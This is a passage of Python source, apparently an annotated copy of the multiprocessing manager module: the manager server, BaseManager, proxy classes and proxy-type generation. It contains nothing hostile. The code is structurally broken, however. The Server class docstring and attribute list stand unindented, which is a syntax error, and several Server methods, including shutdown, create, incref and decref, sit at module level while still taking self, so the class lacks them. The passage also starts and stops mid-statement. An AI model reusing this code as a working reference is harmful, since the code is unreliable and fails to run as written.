               (self.__class__.__name__, self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
    """Send a request over connection *c* and return the manager's reply.

    Raises the converted exception when the reply kind is not '#RETURN'.
    NOTE: the mutable default kwds={} is kept for interface compatibility;
    it is never mutated here.
    """
    c.send((id, methodname, args, kwds))
    kind, result = c.recv()
    if kind != '#RETURN':
        raise convert_to_error(kind, result)
    return result
def convert_to_error(kind, result):
    """Map a (kind, result) failure reply to an exception instance to raise.

    '#ERROR' carries a ready exception object; '#TRACEBACK' and
    '#UNSERIALIZABLE' carry a traceback string wrapped in RemoteError;
    anything else yields a ValueError.
    """
    if kind == '#ERROR':
        return result
    if kind in ('#TRACEBACK', '#UNSERIALIZABLE'):
        if not isinstance(result, str):
            raise TypeError(
                "Result {0!r} (kind '{1}') type is {2}, not str".format(
                    result, kind, type(result)))
        if kind == '#UNSERIALIZABLE':
            return RemoteError('Unserializable message: %s\n' % result)
        return RemoteError(result)
    return ValueError('Unrecognized message type {!r}'.format(kind))
class RemoteError(Exception):
    """Exception carrying a formatted traceback string from the manager process."""

    def __str__(self):
        divider = '-' * 75
        return '\n' + divider + '\n' + str(self.args[0]) + divider
#
# Functions for finding the method names of an object
#
def all_methods(obj):
    '''
    Return a list of names of methods of `obj`
    '''
    # Any callable attribute counts as a "method" here.
    return [name for name in dir(obj) if callable(getattr(obj, name))]
def public_methods(obj):
    '''
    Return a list of names of methods of `obj` which do not start with '_'
    '''
    # Inlines all_methods(): a public method is a callable attribute whose
    # name has no leading underscore.
    return [name for name in dir(obj)
            if name[0] != '_' and callable(getattr(obj, name))]
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
    def __init__(self, registry, address, authkey, serializer):
        """Create the server: validate the authkey and open the listener.

        `registry` maps typeids to (callable, exposed, method_to_typeid,
        proxytype); `serializer` selects the Listener/Client pair from the
        module-level `listener_client` table.
        """
        if not isinstance(authkey, bytes):
            raise TypeError(
                "Authkey {0!r} is type {1!s}, not bytes".format(
                    authkey, type(authkey)))
        self.registry = registry
        self.authkey = process.AuthenticationString(authkey)
        Listener, Client = listener_client[serializer]
        # do authentication later
        self.listener = Listener(address=address, backlog=16)
        self.address = self.listener.address
        # id '0' is reserved for the "no object" token.
        self.id_to_obj = {'0': (None, ())}
        self.id_to_refcount = {}
        self.id_to_local_proxy_obj = {}
        # Protects the id_to_* maps above.
        self.mutex = threading.Lock()
    def serve_forever(self):
        '''
        Run the server forever
        '''
        self.stop_event = threading.Event()
        process.current_process()._manager_server = self
        try:
            # Accept connections on a daemon thread; this thread just waits
            # on the stop event so KeyboardInterrupt is handled here.
            accepter = threading.Thread(target=self.accepter)
            accepter.daemon = True
            accepter.start()
            try:
                while not self.stop_event.is_set():
                    self.stop_event.wait(1)
            except (KeyboardInterrupt, SystemExit):
                pass
        finally:
            if sys.stdout != sys.__stdout__: # what about stderr?
                util.debug('resetting stdout, stderr')
                sys.stdout = sys.__stdout__
                sys.stderr = sys.__stderr__
            sys.exit(0)
    def accepter(self):
        """Accept loop: spawn one daemon handler thread per incoming connection."""
        while True:
            try:
                c = self.listener.accept()
            except OSError:
                # Transient accept failures are ignored and the loop retried.
                continue
            t = threading.Thread(target=self.handle_request, args=(c,))
            t.daemon = True
            t.start()
    def handle_request(self, c):
        '''
        Handle a new connection
        '''
        funcname = result = request = None
        try:
            # Mutual challenge/response authentication using self.authkey.
            connection.deliver_challenge(c, self.authkey)
            connection.answer_challenge(c, self.authkey)
            request = c.recv()
            ignore, funcname, args, kwds = request
            # Only the whitelisted admin methods in `public` may be invoked.
            assert funcname in self.public, '%r unrecognized' % funcname
            func = getattr(self, funcname)
        except Exception:
            msg = ('#TRACEBACK', format_exc())
        else:
            try:
                result = func(c, *args, **kwds)
            except Exception:
                msg = ('#TRACEBACK', format_exc())
            else:
                msg = ('#RETURN', result)
        try:
            c.send(msg)
        except Exception as e:
            # Best effort: report the send failure back, then log locally.
            try:
                c.send(('#TRACEBACK', format_exc()))
            except Exception:
                pass
            util.info('Failure to send message: %r', msg)
            util.info(' ... request was %r', request)
            util.info(' ... exception was %r', e)
        c.close()
    def serve_client(self, conn):
        '''
        Handle requests from the proxies in a particular process/thread
        '''
        util.debug('starting server thread to service %r',
                   threading.current_thread().name)
        # Hoist hot lookups out of the request loop.
        recv = conn.recv
        send = conn.send
        id_to_obj = self.id_to_obj
        while not self.stop_event.is_set():
            try:
                methodname = obj = None
                request = recv()
                ident, methodname, args, kwds = request
                try:
                    obj, exposed, gettypeid = id_to_obj[ident]
                except KeyError as ke:
                    # Fall back to objects only referenced by local proxies.
                    try:
                        obj, exposed, gettypeid = \
                            self.id_to_local_proxy_obj[ident]
                    except KeyError:
                        raise ke
                if methodname not in exposed:
                    raise AttributeError(
                        'method %r of %r object is not in exposed=%r' %
                        (methodname, type(obj), exposed)
                        )
                function = getattr(obj, methodname)
                try:
                    res = function(*args, **kwds)
                except Exception as e:
                    msg = ('#ERROR', e)
                else:
                    # Methods listed in gettypeid return proxies, not values.
                    typeid = gettypeid and gettypeid.get(methodname, None)
                    if typeid:
                        rident, rexposed = self.create(conn, typeid, res)
                        token = Token(typeid, self.address, rident)
                        msg = ('#PROXY', (rexposed, token))
                    else:
                        msg = ('#RETURN', res)
            except AttributeError:
                if methodname is None:
                    msg = ('#TRACEBACK', format_exc())
                else:
                    # Unexposed dunder/special names may still be served via
                    # the fallback mapping (__str__, __repr__, #GETVALUE).
                    try:
                        fallback_func = self.fallback_mapping[methodname]
                        result = fallback_func(
                            self, conn, ident, obj, *args, **kwds
                            )
                        msg = ('#RETURN', result)
                    except Exception:
                        msg = ('#TRACEBACK', format_exc())
            except EOFError:
                util.debug('got EOF -- exiting thread serving %r',
                           threading.current_thread().name)
                sys.exit(0)
            except Exception:
                msg = ('#TRACEBACK', format_exc())
            try:
                try:
                    send(msg)
                except Exception:
                    # The reply itself failed to pickle; report that instead.
                    send(('#UNSERIALIZABLE', format_exc()))
            except Exception as e:
                util.info('exception in thread serving %r',
                          threading.current_thread().name)
                util.info(' ... message was %r', msg)
                util.info(' ... exception was %r', e)
                conn.close()
                sys.exit(1)
    def fallback_getvalue(self, conn, ident, obj):
        # '#GETVALUE' pseudo-method: return the referent itself.
        return obj

    def fallback_str(self, conn, ident, obj):
        # Used when __str__ is not in the referent's exposed set.
        return str(obj)

    def fallback_repr(self, conn, ident, obj):
        # Used when __repr__ is not in the referent's exposed set.
        return repr(obj)

    # Method names served even when absent from the exposed set.
    fallback_mapping = {
        '__str__': fallback_str,
        '__repr__': fallback_repr,
        '#GETVALUE': fallback_getvalue
        }
    def dummy(self, c):
        """No-op endpoint; lets proxies verify the connection is alive."""
        pass
    def debug_info(self, c):
        '''
        Return some info --- useful to spot problems with refcounting
        '''
        # Perhaps include debug info about 'c'?
        with self.mutex:
            result = []
            keys = list(self.id_to_refcount.keys())
            keys.sort()
            for ident in keys:
                if ident != '0':
                    result.append(' %s: refcount=%s\n %s' %
                                  (ident, self.id_to_refcount[ident],
                                   str(self.id_to_obj[ident][0])[:75]))
            return '\n'.join(result)
    def number_of_objects(self, c):
        '''
        Number of shared objects
        '''
        # Doesn't use (len(self.id_to_obj) - 1) as we shouldn't count ident='0'
        return len(self.id_to_refcount)
def shutdown(self, c):
    '''
    Shutdown this process
    '''
    try:
        util.debug('manager received shutdown message')
        # Acknowledge before stopping so the client's dispatch() returns.
        c.send(('#RETURN', None))
    except Exception:
        # Fix: this was a bare `except:`, which would also swallow
        # SystemExit and KeyboardInterrupt; catch only real errors.
        import traceback
        traceback.print_exc()
    finally:
        # Always signal the serve_forever() loop to stop, even if the
        # acknowledgement could not be sent.
        self.stop_event.set()
def create(self, c, typeid, /, *args, **kwds):
    '''
    Create a new shared object and return its id
    '''
    with self.mutex:
        callable, exposed, method_to_typeid, proxytype = \
            self.registry[typeid]

        if callable is None:
            # No factory registered: the (single) positional argument is the
            # already-constructed object itself.
            if kwds or (len(args) != 1):
                raise ValueError(
                    "Without callable, must have one non-keyword argument")
            obj = args[0]
        else:
            obj = callable(*args, **kwds)

        if exposed is None:
            # Nothing declared: expose every public method of the referent.
            exposed = public_methods(obj)
        if method_to_typeid is not None:
            if not isinstance(method_to_typeid, dict):
                raise TypeError(
                    "Method_to_typeid {0!r}: type {1!s}, not dict".format(
                        method_to_typeid, type(method_to_typeid)))
            exposed = list(exposed) + list(method_to_typeid)

        ident = '%x' % id(obj)  # convert to string because xmlrpclib
                                # only has 32 bit signed integers
        util.debug('%r callable returned object with id %r', typeid, ident)

        self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
        if ident not in self.id_to_refcount:
            self.id_to_refcount[ident] = 0

    # incref acquires self.mutex itself, so it must be called after the
    # `with` block above has released the lock.
    self.incref(c, ident)
    return ident, tuple(exposed)
def get_methods(self, c, token):
    '''
    Return the tuple of exposed method names for the shared object
    identified by `token`.
    '''
    _obj, exposed, _gettypeid = self.id_to_obj[token.id]
    return tuple(exposed)
def accept_connection(self, c, name):
    '''
    Spawn a new thread to serve this connection
    '''
    # NOTE(review): no thread is created *here*; this runs in the thread
    # already serving the connection, renames it after the client and then
    # enters the request loop -- presumably the caller spawned the thread.
    threading.current_thread().name = name
    c.send(('#RETURN', None))
    self.serve_client(c)
def incref(self, c, ident):
    # Increment the server-side reference count for the object `ident`.
    with self.mutex:
        try:
            self.id_to_refcount[ident] += 1
        except KeyError as ke:
            # If no external references exist but an internal (to the
            # manager) still does and a new external reference is created
            # from it, restore the manager's tracking of it from the
            # previously stashed internal ref.
            if ident in self.id_to_local_proxy_obj:
                self.id_to_refcount[ident] = 1
                self.id_to_obj[ident] = \
                    self.id_to_local_proxy_obj[ident]
                obj, exposed, gettypeid = self.id_to_obj[ident]
                util.debug('Server re-enabled tracking & INCREF %r', ident)
            else:
                raise ke
def decref(self, c, ident):
    # Decrement the reference count for `ident`, disposing of the referent
    # when the count reaches zero.
    if ident not in self.id_to_refcount and \
        ident in self.id_to_local_proxy_obj:
        # Only a manager-internal (stashed) reference remains; nothing to do.
        util.debug('Server DECREF skipping %r', ident)
        return

    with self.mutex:
        if self.id_to_refcount[ident] <= 0:
            raise AssertionError(
                "Id {0!s} ({1!r}) has refcount {2:n}, not 1+".format(
                    ident, self.id_to_obj[ident],
                    self.id_to_refcount[ident]))
        self.id_to_refcount[ident] -= 1
        if self.id_to_refcount[ident] == 0:
            del self.id_to_refcount[ident]

    if ident not in self.id_to_refcount:
        # Two-step process in case the object turns out to contain other
        # proxy objects (e.g. a managed list of managed lists).
        # Otherwise, deleting self.id_to_obj[ident] would trigger the
        # deleting of the stored value (another managed object) which would
        # in turn attempt to acquire the mutex that is already held here.
        self.id_to_obj[ident] = (None, (), None)  # thread-safe
        util.debug('disposing of obj with id %r', ident)
        with self.mutex:
            del self.id_to_obj[ident]
#
# Class to represent state of a manager
#
class State(object):
    """Tiny mutable record of a manager's lifecycle stage.

    `value` is one of INITIAL (constructed, no server), STARTED (server
    process running) or SHUTDOWN (stopped; cannot be restarted).
    """
    __slots__ = ['value']
    INITIAL = 0
    STARTED = 1
    SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
# Each serializer name maps to the (Listener, Client) pair used to create
# server-side listeners and client connections for that wire format.
listener_client = {
    'pickle' : (connection.Listener, connection.Client),
    'xmlrpclib' : (connection.XmlListener, connection.XmlClient)
    }
#
# Definition of BaseManager
#
class BaseManager(object):
    '''
    Base class for managers
    '''
    _registry = {}
    _Server = Server

    def __init__(self, address=None, authkey=None, serializer='pickle',
                 ctx=None):
        # Inherit the current process's authkey by default so the spawned
        # server process and this client agree on authentication.
        if authkey is None:
            authkey = process.current_process().authkey
        self._address = address     # XXX not final address if eg ('', 0)
        self._authkey = process.AuthenticationString(authkey)
        self._state = State()
        self._state.value = State.INITIAL
        self._serializer = serializer
        self._Listener, self._Client = listener_client[serializer]
        self._ctx = ctx or get_context()

    def get_server(self):
        '''
        Return server object with serve_forever() method and address attribute
        '''
        if self._state.value != State.INITIAL:
            if self._state.value == State.STARTED:
                raise ProcessError("Already started server")
            elif self._state.value == State.SHUTDOWN:
                raise ProcessError("Manager has shut down")
            else:
                raise ProcessError(
                    "Unknown state {!r}".format(self._state.value))
        # NOTE(review): instantiates the module-level Server class rather
        # than self._Server; subclasses that override _Server (e.g.
        # SharedMemoryManager below) also override get_server for this
        # reason -- confirm before relying on _Server here.
        return Server(self._registry, self._address,
                      self._authkey, self._serializer)

    def connect(self):
        '''
        Connect manager object to the server process
        '''
        Listener, Client = listener_client[self._serializer]
        conn = Client(self._address, authkey=self._authkey)
        # Ping the server via the no-op 'dummy' endpoint to verify the
        # connection and the authkey.
        dispatch(conn, None, 'dummy')
        self._state.value = State.STARTED

    def start(self, initializer=None, initargs=()):
        '''
        Spawn a server process for this manager object
        '''
        if self._state.value != State.INITIAL:
            if self._state.value == State.STARTED:
                raise ProcessError("Already started server")
            elif self._state.value == State.SHUTDOWN:
                raise ProcessError("Manager has shut down")
            else:
                raise ProcessError(
                    "Unknown state {!r}".format(self._state.value))
        if initializer is not None and not callable(initializer):
            raise TypeError('initializer must be a callable')

        # pipe over which we will retrieve address of server
        reader, writer = connection.Pipe(duplex=False)

        # spawn process which runs a server
        self._process = self._ctx.Process(
            target=type(self)._run_server,
            args=(self._registry, self._address, self._authkey,
                  self._serializer, writer, initializer, initargs),
            )
        ident = ':'.join(str(i) for i in self._process._identity)
        self._process.name = type(self).__name__ + '-' + ident
        self._process.start()

        # get address of server: close our copy of the write end first so
        # recv() would fail fast if the child died before sending.
        writer.close()
        self._address = reader.recv()
        reader.close()

        # register a finalizer
        self._state.value = State.STARTED
        self.shutdown = util.Finalize(
            self, type(self)._finalize_manager,
            args=(self._process, self._address, self._authkey,
                  self._state, self._Client),
            exitpriority=0
            )

    @classmethod
    def _run_server(cls, registry, address, authkey, serializer, writer,
                    initializer=None, initargs=()):
        '''
        Create a server, report its address and run it
        '''
        # bpo-36368: protect server process from KeyboardInterrupt signals
        signal.signal(signal.SIGINT, signal.SIG_IGN)

        if initializer is not None:
            initializer(*initargs)

        # create server
        server = cls._Server(registry, address, authkey, serializer)

        # inform parent process of the server's address
        writer.send(server.address)
        writer.close()

        # run the manager
        util.info('manager serving at %r', server.address)
        server.serve_forever()

    def _create(self, typeid, /, *args, **kwds):
        '''
        Create a new shared object; return the token and exposed tuple
        '''
        assert self._state.value == State.STARTED, 'server not yet started'
        conn = self._Client(self._address, authkey=self._authkey)
        try:
            id, exposed = dispatch(conn, None, 'create', (typeid,)+args, kwds)
        finally:
            conn.close()
        return Token(typeid, self._address, id), exposed

    def join(self, timeout=None):
        '''
        Join the manager process (if it has been spawned)
        '''
        if self._process is not None:
            self._process.join(timeout)
            if not self._process.is_alive():
                self._process = None

    def _debug_info(self):
        '''
        Return some info about the servers shared objects and connections
        '''
        conn = self._Client(self._address, authkey=self._authkey)
        try:
            return dispatch(conn, None, 'debug_info')
        finally:
            conn.close()

    def _number_of_objects(self):
        '''
        Return the number of shared objects
        '''
        conn = self._Client(self._address, authkey=self._authkey)
        try:
            return dispatch(conn, None, 'number_of_objects')
        finally:
            conn.close()

    def __enter__(self):
        # Lazily start the server process on first context entry.
        if self._state.value == State.INITIAL:
            self.start()
        if self._state.value != State.STARTED:
            if self._state.value == State.INITIAL:
                raise ProcessError("Unable to start server")
            elif self._state.value == State.SHUTDOWN:
                raise ProcessError("Manager has shut down")
            else:
                raise ProcessError(
                    "Unknown state {!r}".format(self._state.value))
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.shutdown()

    @staticmethod
    def _finalize_manager(process, address, authkey, state, _Client):
        '''
        Shutdown the manager process; will be registered as a finalizer
        '''
        if process.is_alive():
            # Ask nicely first; best-effort, so all errors are ignored.
            util.info('sending shutdown message to manager')
            try:
                conn = _Client(address, authkey=authkey)
                try:
                    dispatch(conn, None, 'shutdown')
                finally:
                    conn.close()
            except Exception:
                pass

            process.join(timeout=1.0)
            if process.is_alive():
                # Escalate to terminate() if it did not exit in time.
                util.info('manager still alive')
                if hasattr(process, 'terminate'):
                    util.info('trying to `terminate()` manager process')
                    process.terminate()
                    process.join(timeout=0.1)
                    if process.is_alive():
                        util.info('manager still alive after terminate')

        state.value = State.SHUTDOWN
        try:
            del BaseProxy._address_to_local[address]
        except KeyError:
            pass

    @property
    def address(self):
        return self._address

    @classmethod
    def register(cls, typeid, callable=None, proxytype=None, exposed=None,
                 method_to_typeid=None, create_method=True):
        '''
        Register a typeid with the manager type
        '''
        if '_registry' not in cls.__dict__:
            # Give each subclass its own registry copy so registrations on a
            # subclass do not leak into the parent class.
            cls._registry = cls._registry.copy()

        if proxytype is None:
            proxytype = AutoProxy

        exposed = exposed or getattr(proxytype, '_exposed_', None)

        method_to_typeid = method_to_typeid or \
                           getattr(proxytype, '_method_to_typeid_', None)

        if method_to_typeid:
            for key, value in list(method_to_typeid.items()): # isinstance?
                assert type(key) is str, '%r is not a string' % key
                assert type(value) is str, '%r is not a string' % value

        cls._registry[typeid] = (
            callable, exposed, method_to_typeid, proxytype
            )

        if create_method:
            # Generate a convenience factory method named after the typeid.
            def temp(self, /, *args, **kwds):
                util.debug('requesting creation of a shared %r object', typeid)
                token, exp = self._create(typeid, *args, **kwds)
                proxy = proxytype(
                    token, self._serializer, manager=self,
                    authkey=self._authkey, exposed=exp
                    )
                # The server took a reference on creation and the proxy's
                # _incref() took another; drop the creation reference.
                conn = self._Client(token.address, authkey=self._authkey)
                dispatch(conn, None, 'decref', (token.id,))
                return proxy
            temp.__name__ = typeid
            setattr(cls, typeid, temp)
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
    # A set that is emptied in the child after a fork, so that proxy ids
    # inherited from the parent are not treated as owned by the child.
    def __init__(self):
        util.register_after_fork(self, lambda obj: obj.clear())
    def __reduce__(self):
        # Pickles as a fresh empty set: the contents are process-local.
        return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
    '''
    A base for proxies of shared objects
    '''
    # Maps a manager address to (thread-local storage, ProcessLocalSet)
    # shared by every proxy in this process talking to that manager.
    _address_to_local = {}
    _mutex = util.ForkAwareThreadLock()

    def __init__(self, token, serializer, manager=None,
                 authkey=None, exposed=None, incref=True, manager_owned=False):
        with BaseProxy._mutex:
            tls_idset = BaseProxy._address_to_local.get(token.address, None)
            if tls_idset is None:
                tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
                BaseProxy._address_to_local[token.address] = tls_idset

        # self._tls is used to record the connection used by this
        # thread to communicate with the manager at token.address
        self._tls = tls_idset[0]

        # self._idset is used to record the identities of all shared
        # objects for which the current process owns references and
        # which are in the manager at token.address
        self._idset = tls_idset[1]

        self._token = token
        self._id = self._token.id
        self._manager = manager
        self._serializer = serializer
        self._Client = listener_client[serializer][1]

        # Should be set to True only when a proxy object is being created
        # on the manager server; primary use case: nested proxy objects.
        # RebuildProxy detects when a proxy is being created on the manager
        # and sets this value appropriately.
        self._owned_by_manager = manager_owned

        if authkey is not None:
            self._authkey = process.AuthenticationString(authkey)
        elif self._manager is not None:
            self._authkey = self._manager._authkey
        else:
            self._authkey = process.current_process().authkey

        if incref:
            self._incref()

        util.register_after_fork(self, BaseProxy._after_fork)

    def _connect(self):
        # Open (and cache in thread-local storage) a connection to the
        # manager, identified by process/thread name for debugging.
        util.debug('making connection to manager')
        name = process.current_process().name
        if threading.current_thread().name != 'MainThread':
            name += '|' + threading.current_thread().name
        conn = self._Client(self._token.address, authkey=self._authkey)
        dispatch(conn, None, 'accept_connection', (name,))
        self._tls.connection = conn

    def _callmethod(self, methodname, args=(), kwds={}):
        '''
        Try to call a method of the referrent and return a copy of the result
        '''
        try:
            conn = self._tls.connection
        except AttributeError:
            # First call from this thread: establish a connection lazily.
            util.debug('thread %r does not own a connection',
                       threading.current_thread().name)
            self._connect()
            conn = self._tls.connection

        conn.send((self._id, methodname, args, kwds))
        kind, result = conn.recv()

        if kind == '#RETURN':
            return result
        elif kind == '#PROXY':
            # The server created a nested shared object; wrap it locally.
            exposed, token = result
            proxytype = self._manager._registry[token.typeid][-1]
            token.address = self._token.address
            proxy = proxytype(
                token, self._serializer, manager=self._manager,
                authkey=self._authkey, exposed=exposed
                )
            # Drop the creation reference (the proxy holds its own).
            conn = self._Client(token.address, authkey=self._authkey)
            dispatch(conn, None, 'decref', (token.id,))
            return proxy
        raise convert_to_error(kind, result)

    def _getvalue(self):
        '''
        Get a copy of the value of the referent
        '''
        return self._callmethod('#GETVALUE')

    def _incref(self):
        if self._owned_by_manager:
            util.debug('owned_by_manager skipped INCREF of %r', self._token.id)
            return

        conn = self._Client(self._token.address, authkey=self._authkey)
        dispatch(conn, None, 'incref', (self._id,))
        util.debug('INCREF %r', self._token.id)

        self._idset.add(self._id)

        state = self._manager and self._manager._state

        # Finalizer releasing the server-side reference when the proxy dies.
        self._close = util.Finalize(
            self, BaseProxy._decref,
            args=(self._token, self._authkey, state,
                  self._tls, self._idset, self._Client),
            exitpriority=10
            )

    @staticmethod
    def _decref(token, authkey, state, tls, idset, _Client):
        idset.discard(token.id)

        # check whether manager is still alive
        if state is None or state.value == State.STARTED:
            # tell manager this process no longer cares about referent
            try:
                util.debug('DECREF %r', token.id)
                conn = _Client(token.address, authkey=authkey)
                dispatch(conn, None, 'decref', (token.id,))
            except Exception as e:
                util.debug('... decref failed %s', e)

        else:
            util.debug('DECREF %r -- manager already shutdown', token.id)

        # check whether we can close this thread's connection because
        # the process owns no more references to objects for this manager
        if not idset and hasattr(tls, 'connection'):
            util.debug('thread %r has no more proxies so closing conn',
                       threading.current_thread().name)
            tls.connection.close()
            del tls.connection

    def _after_fork(self):
        # The forked child must take its own reference on the referent.
        self._manager = None
        try:
            self._incref()
        except Exception as e:
            # the proxy may just be for a manager which has shutdown
            util.info('incref failed: %s' % e)

    def __reduce__(self):
        kwds = {}
        if get_spawning_popen() is not None:
            # Spawned children inherit our authkey explicitly.
            kwds['authkey'] = self._authkey

        if getattr(self, '_isauto', False):
            kwds['exposed'] = self._exposed_
            return (RebuildProxy,
                    (AutoProxy, self._token, self._serializer, kwds))
        else:
            return (RebuildProxy,
                    (type(self), self._token, self._serializer, kwds))

    def __deepcopy__(self, memo):
        # Deep-copying a proxy yields a plain copy of the referent.
        return self._getvalue()

    def __repr__(self):
        return '<%s object, typeid %r at %#x>' % \
               (type(self).__name__, self._token.typeid, id(self))

    def __str__(self):
        '''
        Return representation of the referent (or a fall-back if that fails)
        '''
        try:
            return self._callmethod('__repr__')
        except Exception:
            return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
    '''
    Function used for unpickling proxy objects.
    '''
    server = getattr(process.current_process(), '_manager_server', None)
    if server and server.address == token.address:
        # Unpickling inside the manager server itself: mark the proxy as
        # manager-owned and stash a local reference to the referent so the
        # server keeps tracking it (see Server.incref).
        util.debug('Rebuild a proxy owned by manager, token=%r', token)
        kwds['manager_owned'] = True
        if token.id not in server.id_to_local_proxy_obj:
            server.id_to_local_proxy_obj[token.id] = \
                server.id_to_obj[token.id]
    # Do not incref while being inherited by a child process: the parent's
    # reference already covers it.
    incref = (
        kwds.pop('incref', True) and
        not getattr(process.current_process(), '_inheriting', False)
        )
    return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
    '''
    Return a proxy type whose methods are given by `exposed`
    '''
    # NOTE: the mutable default `_cache` is intentional -- it memoises
    # generated proxy types across calls, keyed by (name, exposed).
    exposed = tuple(exposed)
    try:
        return _cache[(name, exposed)]
    except KeyError:
        pass

    dic = {}

    # Generate one forwarding method per exposed name via exec().
    for meth in exposed:
        exec('''def %s(self, /, *args, **kwds):
        return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)

    ProxyType = type(name, (BaseProxy,), dic)
    ProxyType._exposed_ = exposed
    _cache[(name, exposed)] = ProxyType
    return ProxyType
def AutoProxy(token, serializer, manager=None, authkey=None,
              exposed=None, incref=True):
    '''
    Return an auto-proxy for `token`
    '''
    _Client = listener_client[serializer][1]

    if exposed is None:
        # Ask the server which methods the referent exposes.
        conn = _Client(token.address, authkey=authkey)
        try:
            exposed = dispatch(conn, None, 'get_methods', (token,))
        finally:
            conn.close()

    if authkey is None and manager is not None:
        authkey = manager._authkey
    if authkey is None:
        authkey = process.current_process().authkey

    ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
    proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
                      incref=incref)
    # Flag so __reduce__ repickles via AutoProxy with the same exposure.
    proxy._isauto = True
    return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
    """Simple attribute container; repr() lists only public attributes,
    sorted by their formatted 'name=value' text."""
    def __init__(self, /, **kwds):
        self.__dict__.update(kwds)
    def __repr__(self):
        public = sorted(
            '%s=%r' % (attr, val)
            for attr, val in self.__dict__.items()
            if not attr.startswith('_')
            )
        return '%s(%s)' % (self.__class__.__name__, ', '.join(public))
class Value(object):
    """Server-side holder for a single typed value.

    `lock` is accepted for signature compatibility with the ctypes-backed
    Value but is unused here -- the manager serialises access instead.
    """
    def __init__(self, typecode, value, lock=True):
        self._typecode = typecode
        self._value = value
    def get(self):
        # Return the stored value.
        return self._value
    def set(self, value):
        # Replace the stored value.
        self._value = value
    def __repr__(self):
        return '%s(%r, %r)'%(type(self).__name__, self._typecode, self._value)
    value = property(get, set)
def Array(typecode, sequence, lock=True):
    """Factory for the manager's 'Array' typeid: build an array.array.

    `lock` is accepted for signature compatibility with the ctypes-backed
    Array but is not used here.
    """
    arr = array.array(typecode, sequence)
    return arr
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
    # Proxy for server-side iterators/generators: forwards the iterator
    # protocol plus the generator control methods over the connection.
    _exposed_ = ('__next__', 'send', 'throw', 'close')
    def __iter__(self):
        # The proxy itself is the local iterator object.
        return self
    def __next__(self, *args):
        return self._callmethod('__next__', args)
    def send(self, *args):
        return self._callmethod('send', args)
    def throw(self, *args):
        return self._callmethod('throw', args)
    def close(self, *args):
        return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
    # Proxy for lock-like referents (Lock, RLock, Semaphore, ...).
    _exposed_ = ('acquire', 'release')
    def acquire(self, blocking=True, timeout=None):
        # Only forward `timeout` when given, so referents whose acquire()
        # takes no timeout argument still work.
        args = (blocking,) if timeout is None else (blocking, timeout)
        return self._callmethod('acquire', args)
    def release(self):
        return self._callmethod('release')
    def __enter__(self):
        # Context-manager entry: blocking acquire with no timeout.
        return self._callmethod('acquire')
    def __exit__(self, exc_type, exc_val, exc_tb):
        return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
    # Proxy for a threading.Condition living in the manager process.
    _exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
    def wait(self, timeout=None):
        return self._callmethod('wait', (timeout,))
    def notify(self, n=1):
        return self._callmethod('notify', (n,))
    def notify_all(self):
        return self._callmethod('notify_all')
    def wait_for(self, predicate, timeout=None):
        # Client-side reimplementation of Condition.wait_for(): the
        # predicate is a local callable, so it cannot be sent to the server.
        result = predicate()
        if result:
            return result
        if timeout is not None:
            endtime = time.monotonic() + timeout
        else:
            endtime = None
            waittime = None
        while not result:
            if endtime is not None:
                waittime = endtime - time.monotonic()
                if waittime <= 0:
                    # Timed out; return the (falsy) last predicate result.
                    break
            self.wait(waittime)
            result = predicate()
        return result
class EventProxy(BaseProxy):
    # Proxy for a threading.Event living in the manager process.
    _exposed_ = ('is_set', 'set', 'clear', 'wait')
    def is_set(self):
        return self._callmethod('is_set')
    def set(self):
        return self._callmethod('set')
    def clear(self):
        return self._callmethod('clear')
    def wait(self, timeout=None):
        return self._callmethod('wait', (timeout,))
class BarrierProxy(BaseProxy):
    # Proxy for a threading.Barrier; read-only attributes are fetched via
    # the exposed '__getattribute__' rather than dedicated methods.
    _exposed_ = ('__getattribute__', 'wait', 'abort', 'reset')
    def wait(self, timeout=None):
        return self._callmethod('wait', (timeout,))
    def abort(self):
        return self._callmethod('abort')
    def reset(self):
        return self._callmethod('reset')
    @property
    def parties(self):
        return self._callmethod('__getattribute__', ('parties',))
    @property
    def n_waiting(self):
        return self._callmethod('__getattribute__', ('n_waiting',))
    @property
    def broken(self):
        return self._callmethod('__getattribute__', ('broken',))
class NamespaceProxy(BaseProxy):
    # Proxy forwarding arbitrary attribute access to the referent; names
    # starting with '_' are handled locally so the proxy's own machinery
    # (self._callmethod etc.) keeps working.
    _exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
    def __getattr__(self, key):
        if key[0] == '_':
            return object.__getattribute__(self, key)
        callmethod = object.__getattribute__(self, '_callmethod')
        return callmethod('__getattribute__', (key,))
    def __setattr__(self, key, value):
        if key[0] == '_':
            return object.__setattr__(self, key, value)
        callmethod = object.__getattribute__(self, '_callmethod')
        return callmethod('__setattr__', (key, value))
    def __delattr__(self, key):
        if key[0] == '_':
            return object.__delattr__(self, key)
        callmethod = object.__getattribute__(self, '_callmethod')
        return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
    # Proxy for the Value holder defined above; `value` mirrors the
    # referent's property for convenient attribute-style access.
    _exposed_ = ('get', 'set')
    def get(self):
        return self._callmethod('get')
    def set(self, value):
        return self._callmethod('set', (value,))
    value = property(get, set)
# Generated proxy exposing the standard (mutable-)sequence methods of list.
BaseListProxy = MakeProxyType('BaseListProxy', (
    '__add__', '__contains__', '__delitem__', '__getitem__', '__len__',
